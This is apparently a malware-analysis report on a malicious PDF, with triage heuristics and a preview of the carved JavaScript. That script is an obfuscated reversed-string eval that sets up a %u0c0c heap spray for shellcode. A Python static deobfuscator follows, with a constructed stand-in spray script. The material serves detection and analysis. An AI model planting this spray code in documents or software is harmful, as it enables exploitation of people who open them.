Verdict: MALICIOUS
Risk score: 68

Machine learning
- Nyx PDF Classifier malicious score 0.9996

Heuristics (4)
- Suspicious extracted artifact (medium) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- JavaScript action (low, 1 related finding) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://www.bitstream.com (in PDF document text)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0012_000.js | pdf-javascript-stream | PDF /JS object 12 at offset 0x104F0 | 2606 bytes |

SHA-256: 8d2204603c54fe43a8f4598bc74219e1578d80ef7ce2535d8a954851bc6a4ffd
Detection
ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s) and 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script)

```javascript
var eva=new Function("a","ev al (a);".split(" ").join(""));
var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )"%" ,"Q"(ecalper."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" (epak = olygak rav ;epacsenu = epak rav ';
eva(s.split("").reverse().join(""));
```
| Filename | Kind | Source | Size |
|---|---|---|---|
| font_00_sfnt_off00000319.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x319 | 65932 bytes |

SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723

Detection
ClamAV: No threats found
Obfuscation or payload: likely. Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)
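Reading the preview script backwards already tells the story: `eva` is `eval` assembled with split/join so the token never appears literally, and the reversed literal builds `unescape`d `%u0c0c%u0c0c` blocks grown to 0x80000 bytes, a shellcode blob (the base64-like blob the triage rule counted, with `Q` swapped back to `%`) placed at an offset derived from 0x0c0c, and a loop that fills an array with 0x1f0 copies. That is a classic 0x0c0c0c0c heap spray, and none of it needs to be executed to be seen. As an added example (not part of this report or the analyzer's tooling), the Python below does that peeling statically for scripts of this shape and also scans a binary blob for the long single-byte runs behind an indicator like "heap spray 0x41 (A)". The JS and byte blob embedded in it are constructed stand-ins in the same shape as the carved files, not the files themselves, and all function names are the example's own. A run of one byte inside a 64 KB font stream is only an indicator; confirm the flagged region by disassembling it before calling it shellcode.

```python
"""Static triage of carved PDF artifacts (added example): peel a reversed-string
eval layer without executing it, then scan a blob for single-byte spray runs."""
import re

# Constructed stand-in JS in the shape of the preview: split/join-built eval,
# a reversed literal, unescape + %u0c0c slide, spray loop. Shellcode is a
# placeholder, not the sample's payload.
SAMPLE_PLAIN = (
    'var kape = unescape; var sc = kape("QuDEADQuBEEF".replace("Q","%")); '
    'var nops = kape("%" + "u" + "0c0c" + "%" + "u" + "0c0c"); '
    'while (nops.length + 20 + 8 < 65536) nops += nops; '
    'var blk = nops.substring(0, (0x0c0c - 0x24) / 2) + sc + nops; '
    'var spray = new Array(); '
    'for (i = 0; i < 0x1f0; i++) spray[i] = blk + "s";'
)
SAMPLE_JS = (
    'var eva=new Function("a","ev al (a);".split(" ").join(""));\n'
    "var s='" + SAMPLE_PLAIN[::-1] + "';\n"
    'eva(s.split("").reverse().join(""));'
)
# Constructed binary blob: a 1024-byte run of 0x41 ('A') at offset 1024.
SAMPLE_BLOB = bytes(range(256)) * 4 + b"A" * 1024 + bytes(range(256))

NOP_TOKENS = ("%u0c0c", "%u0d0d", "%u0a0a", "%u9090")


def find_eval_aliases(js):
    """Names bound to a split/join-assembled eval wrapper, e.g.
    var eva=new Function("a","ev al (a);".split(" ").join(""))."""
    pat = re.compile(
        r'var\s+(\w+)\s*=\s*new\s+Function\s*\(\s*"(\w+)"\s*,\s*'
        r'"([^"]*)"\.split\(" "\)\.join\(""\)\s*\)')
    aliases = []
    for name, param, body in pat.findall(js):
        if body.replace(" ", "").startswith("eval(" + param + ")"):
            aliases.append(name)
    return aliases


def find_string_vars(js):
    """Map variable names to the single-quoted literals assigned to them."""
    return {m.group(1): m.group(2)
            for m in re.finditer(r"var\s+(\w+)\s*=\s*'([^']*)'", js)}


def peel_reversed_eval(js):
    """Undo alias(s.split("").reverse().join("")) statically: return the
    reversed-back plaintext, or None when the pattern is absent."""
    literals = find_string_vars(js)
    for alias in find_eval_aliases(js):
        m = re.search(re.escape(alias) +
                      r'\(\s*(\w+)\.split\(""\)\.reverse\(\)\.join\(""\)\s*\)', js)
        if m and m.group(1) in literals:
            return literals[m.group(1)][::-1]
    return None


def spray_indicators(plain):
    """Summarise heap-spray markers in deobfuscated JS. String concatenation
    and whitespace are squashed first so "%" + "u" + "0c0c" still counts."""
    squashed = re.sub(r'"\s*\+\s*"', "", plain)      # "%" + "u" -> "%u"
    squashed = re.sub(r"\s+", "", squashed)
    loop = re.search(r"for\(\w+=0;\w+<(0x[0-9a-fA-F]+|\d+);", squashed)
    return {
        "unescape": "unescape" in squashed,
        "nop_tokens": sorted(t for t in NOP_TOKENS if t in squashed.lower()),
        "grow_loop": bool(re.search(r"while\(\w+\.length[^)]*<", squashed)),
        "spray_count": int(loop.group(1), 0) if loop else None,
    }


def longest_byte_run(data, byte, min_len=256):
    """(offset, length) of the longest run of `byte` at least min_len long,
    or None. Weak evidence on its own; confirm by disassembling the region."""
    best, i, n = None, 0, len(data)
    while i < n:
        if data[i] != byte:
            i += 1
            continue
        j = i
        while j < n and data[j] == byte:
            j += 1
        if j - i >= min_len and (best is None or j - i > best[1]):
            best = (i, j - i)
        i = j
    return best


if __name__ == "__main__":
    plain = peel_reversed_eval(SAMPLE_JS)
    print(plain)
    print(spray_indicators(plain))
    print(longest_byte_run(SAMPLE_BLOB, 0x41))
```

Run against a real carved script, `peel_reversed_eval` only handles this one layer; nested layers are peeled by feeding its output back in, and anything it cannot match is a cue to fall back to an instrumented JS engine, never to the browser's.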